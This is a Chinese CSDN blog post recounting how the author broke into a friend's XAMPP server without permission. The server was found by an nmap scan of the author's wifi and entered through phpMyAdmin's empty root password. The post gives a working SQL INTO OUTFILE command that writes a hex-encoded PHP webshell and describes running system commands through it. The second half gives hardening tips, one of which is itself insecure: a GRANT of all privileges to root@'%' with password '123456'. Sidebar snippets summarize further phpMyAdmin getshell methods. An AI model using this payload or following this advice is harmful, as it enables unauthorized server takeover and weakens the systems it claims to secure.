mysql提权软件后门_Mysql提权留后门

最新推荐文章于 2023-09-19 15:35:42 发布
最新推荐文章于 2023-09-19 15:35:42 发布
阅读量97 收藏
点赞数
文章标签: mysql提权软件后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42411799/article/details/113332047
版权

记录一次关于无聊时对基友MYSQL服务器的提权攻击。

尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。

0x01.从无聊的nmap扫描开始

今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。

0818b9ca8b590ca3270a3433284dd417.png

看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。

0818b9ca8b590ca3270a3433284dd417.png

登进去后,就想办法留个后门,搞个木马。注意一下,mysql是以管理员权限运行的,so...

查了下资料,这个很简单,网上很多。

找个一个表进去,用下面那句话,就搞定了。

SELECT 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E FROM user into outfile '/Applications/XAMPP/xamppfiles/phpmyadmin/fuck.php'

那一串字符就是 <?php system($_REQUEST[cmd]);?> 的十六进制编码了,只要路径对,就ok了。

进去以后,只要访问 /phpmyadmin/fuck.php?cmd= 就能直接打terminal命令了。

0818b9ca8b590ca3270a3433284dd417.png

可以看到我输入ls /输出了跟目录下面的文件和文件夹。

这个时候,如果是win党,来个中国菜刀!!!啊啊啊,条子!!带走!!!

0x02.关于Xampp安全(MAC环境)

下面说下个人经历,关于MAC下,xampp环境的安全处理。

A.关闭phpmyadmin远程登录

vim /Applications/XAMPP/xamppfiles/etc/extra/http-xmapp.conf

在最底下添加访问权限,以及关闭修改权限。

Require local

ErrorDocument 403 /error/XAMPP_FORBIDDEN.html.var

B.关闭Http远程访问权限

vim /Applications/XAMPP/xamppfiles/apache2/conf/httpd.conf

Options Indexes FollowSymLinks

AllowOverride All

Order allow,deny

Deny from all #拒绝远程访问

C.关于Mysql文件写入权限

这里不是所有都能写入的,只要关闭了用户写入权限,就不能写入木马了。这个时候,就需要对xampp配置做处理下。

这是我本地测试:

0818b9ca8b590ca3270a3433284dd417.png

关闭mysql写入文件权限(我本地的):

vim /Applications/XAMPP/xamppfiles/etc/extra/http-xmapp.conf

# since XAMPP 1.4.3

AllowOverride AuthConfig Limit

Require all granted

不管怎么样,反正记得,创建的文件夹,非不得已,不要 chmod 777,特别是upload等目录,注意防范。

D.修改Mysql密码

1、进入到phpmyadmin后,直接执行SQL语句:

update user set password=password('123456') where User='root'

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;

2、直接修改

vim /Applications/XAMPP/xamppfiles/etc/my.conf

找到19行:

password = your_password

0x03.关于xmapp的一些环境

1、端口占用问题(最常见的)

Http 80端口configure在:

/Applications/XAMPP/xamppfiles/etc/httpd.conf

52行:

Mysql 3306端口configure在:

/Applications/XAMPP/xamppfiles/etc/my.conf

20行

2、添加vhost

/Applications/XAMPP/xamppfiles/etc/extra/http-vhost.conf

3、配置Mysql缓存大小

大多数的MySQL服务器都开启了查询缓存。这是提高性最有效的方法之一,而且这是被MySQL的数据库引擎处理的。当有很多相同的查询被执行了多次的时候,这些查询结果会被放到一个缓存中,这样,后续的相同的查询就不用操作表而直接访问缓存结果了。

/Applications/XAMPP/xamppfiles/etc/httpd.conf

最后面:

[isamchk]

key_buffer = 20M

sort_buffer_size = 20M

read_buffer = 2M

write_buffer = 2M

-by小草

2014-12-27 02:46:38

天也要避我
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql后门_Mysql权留后门
weixin_33303537的博客
01-18 498
记录一次关于无聊时对基友MYSQL服务器的攻击。尽管没有完全攻击到对方,并且没有清理痕迹,但是,这里写写简单的防御方式。0x01.从无聊的nmap扫描开始今晚无聊时候,本想打开电脑扫下谁连进我wifi,无意间,眼睛一亮看到了一个惊喜。看到80端口,就有种冲动想要进去,进去后发现forbidden,然后试了试 phpmyadmin,发现直接进去,因为基友用的XAMPP集成环境,一下就猜到空密码。...
phpmyadmin——
weixin_53639243的博客
01-29 508
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置。用于 secur_file_priv 为null 或限定值 不在网页目录时。执行下面的sql语句,创建表并在表中写入一句话木马,在导出到网站的根路径。2.secure_file_priv 不为null 具体描述在下边。general_log_file:日志保存路径。3.要知道网站的绝对路径,写入马才能连接。
phpMyAdmin
Clannad的博客
01-10 1691
文章目录条件 条件 1、secure_file_priv的值不为NULL
【phpMyadmin】MYSQL突破secure_file_priv写shell
失心少年
09-19 990
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
phpmyadmin getshell到
blue_fantasy的博客
01-11 771
Text. 环境准备:win7,phpstudy(包含phpmyadmin,可用旧版) 开始攻击: 通过弱口令,信息收集,爆破等方式获知phpmyadmin的账号密码是root root 开始登录目标机器上的phpmyadmin 2.检测MySQL全局变量(generallog、generallog file)的值。 在SQL处输入sql语句: SHOW VARIABLES LIKE ‘general%’ 看到general log 指的是日志保存状态,一共有两个值(ON/OFF)ON
PHP myAdmin
zkjsdk的博客
01-13 496
登录phpmyadmin 后台 默认密码root root 的关键点 绝对路径 开启日志 1.先判断日志是否打开 show global variables like ‘%general%’; 如果没开 执行以下语句 set global general_log = “ON”; show global variables like ‘%general%’; 2.设置路径 根据情况设置...
服务器(实战).wmv
10-12
其次,MySQL数据库的也是一大关注点。MySQL作为广泛使用的数据库系统,如果配置不当,也可能成为的入口。例如,弱口令、不安全的默认设置、过时的版本或是过度的限分配,都可能导致数据库被攻击者控制。...
星外下的mysql1
08-08
本文主要讨论了一种针对MySQL数据库的方法,由作者残剑在哈客部落分享。文章中到的情景是从一个WordPress网站开始,通过上传PHP后门获取了旁站的SHELL限,然后发现了一个支持.NET和PHP的环境,但限受限于...
sql注入拿服务器
12-06
"sql注入拿服务器"这个话题涉及到利用SQL注入漏洞来限并最终控制服务器的过程。在这个过程中,攻击者通常会经过几个关键步骤来实现目标。 首先,**发现SQL注入漏洞**。这通常通过输入特定的测试数据来...
PHP、mysql(手工注入)
10-12
- **后台后门**:攻击者通过注入获取系统限,植入后门,用于长期控制和窃取数据。 - 防范措施包括:定期审计代码,删除不必要的功能,限制对敏感文件的访问,使用安全的编程实践,以及实施Web应用防火墙等。 5....
phpMyadmin新建数据库,添加用户并配置用户限 方法
08-31
phpMyadmin新建数据库,添加用户并配置用户限 有翻译
PHP个人在线自动发卡源码带后台
05-08
PHP个人在线自动发卡源码带后台
php检测 Phpmyadmin漏洞演示
07-21
php检测 php检测 Phpmyadmin漏洞演示
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
NFine快速开发框架Mysql版去后门
01-09
1、原版NFine框架经过修改,由Ms SqlServer数据库改成MySQL数据库,去掉原版的后门连接,后门连接在Js文件包含“aWZyYW1lanMwMDAwMQ”字串的函数中 2、数据库驱动采用EF6的MySql.Data.EntityFramework 和MySql.Data...
关于PHPMYADMIN的入侵拿服务器
热门推荐
u011500307的专栏
12-01 1万+
转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e 作者不详 关于PHPMYADMIN的入侵拿服务器 1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.* 打开网站一看,发现是用FLEAPHP写的一个程序 因为刚好在研究FLEAPHP开源开发系统,大致了
Web渗透小案例——利用MSF拿下phpmyadmin的windows服务器system限并读取管理员密码
Mr_Wanderer的博客
08-08 2120
文章目录配置靶机新建低限用户安装phpstudy为phpstudy相关服务分配限设置mysql限设置Apache限设置apache和MySQLa服务更换phpmyadmin版本漏洞原理使用MSF进行漏洞利用打开msf爆破靶机密码利用phpmyadmin漏洞进行攻击建立稳定连接生成反向连接木马攻击机开启端口监听,等待靶机连接攻击机上传木马并运行获取管理员账号和密码加载mimikatz迁移进程写在最后亲测可行。如果本文有帮到您,求点赞留言~如果有任何疑问,请私信我 配置靶机 靶机操作系统选择wind
PhPmyadmin之FILE限修改
weixin_67803112的博客
11-05 505
每一次渗透都是在开盲盒,永远不知道下一个难点在哪里……需要我们一次次尝试,一次次失败,一次次总结,才会把我们所谓的难点变成基操…..
phpmyadmin mysql_phpMyadmin那些事
weixin_34603814的博客
01-20 187
phpMyadmin那些事引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行呢?往下看,我今天和你说说phpMyadmin那些事。0x00 定义​ phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。0x01 环境准备目标: Windows Serve...
msf mysql_login
最新发布
06-27
Msf (Metasploit Framework) 是一个广泛使用的开源渗透测试框架,用于评估网络安全性并发现潜在漏洞。`mysql_login` 是 Msf 中的一个模块,它主要用于...4. **收集证据**:可能包括获取数据库的敏感信息、设置后门等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值